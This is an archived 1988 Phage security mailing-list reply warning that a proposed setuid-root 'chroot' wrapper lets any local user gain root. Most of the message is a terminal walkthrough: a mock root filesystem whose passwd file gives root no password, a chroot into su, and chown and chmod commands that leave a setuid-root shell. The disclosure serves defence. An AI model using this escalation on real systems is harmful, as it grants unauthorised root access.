The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #305 [Re: revised tftpd writeup] (1 message, 729 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/305.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: "Lennart_Lovstrand.EuroPARC"@xerox.com
To: phage
Date: Fri 13:28:33 25/11/1988 EST
Subject: Re: revised tftpd writeup
References: [Thread Prev: 303] [Thread Next: 300] [Message Prev: 299] [Message Next: 300]

> Its not necessary to hack tftpd at all.  Just write a small setuid root
> program called "chroot".  It chdir()s and chroot()s to its first
argument,
> setuid()s to the invoker's real uid, and then exec()s the program given
by
> the remaining arguments.

Please either don't make that program setuid root or hardwire the directory
you are chrooting to!

If you leave it as is, any user on your system can make themselves a setuid
root shell by creating a mock root file system as in the following example:

|  % pwd
|  /home/lovstrand/foo
|  % ls -R
|  bin	chroot	etc
| 
|  bin:
|  chmod	chown	sh	su
| 
|  etc:
|  passwd
|  % cat etc/passwd
|  root::0:0:
|  % ls -l bin/sh
|  -rwxr-xr-x  1 lovstran    57344 Nov 25 17:59 bin/sh
|  % chroot . bin/su
|  # chown root bin/sh
|  # chmod u+s root bin/sh
|  # ^D
|  % ls -l bin/sh
|  -rwsr-xr-x  1 root        57344 Nov 25 17:59 bin/sh

--Lennart <Lovstrand.EuroPARC@Xerox.COM>
Rank Xerox EuroPARC, 61 Regent Street, Cambridge CB2 1AB, England

END OF DOCUMENT